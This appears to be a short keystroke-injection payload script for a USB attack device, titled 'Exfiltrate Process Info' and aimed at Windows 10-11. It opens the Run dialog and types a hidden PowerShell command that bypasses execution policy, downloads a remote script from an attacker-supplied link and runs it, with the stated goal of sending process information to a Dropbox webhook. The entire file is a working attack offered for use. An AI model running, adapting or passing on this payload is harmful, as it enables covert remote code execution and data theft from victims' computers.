* ##########################################
* #                                        |
* # Title        : Exfiltrate Process Info |
* # Author       : Aleff                   |
* # Version      : 1.0                     |
* # Category     : Exfiltration            |
* # Target       : Windows 10-11           |
* #                                        |
* ##########################################

* Requirements:
*     - Internet Connection
*     - Dropbox Webhook


QUACK DELAY 2000
QUACK GUI r
QUACK DELAY 250
QUACK DELETE

* REQUIRED - Reply example.com with YOUR LINK. The Payload should be ExfiltrateProcessInfo.ps1
QUACK STRING powershell -w h -ep bypass irm PAYLOAD | iex
QUACK ENTER
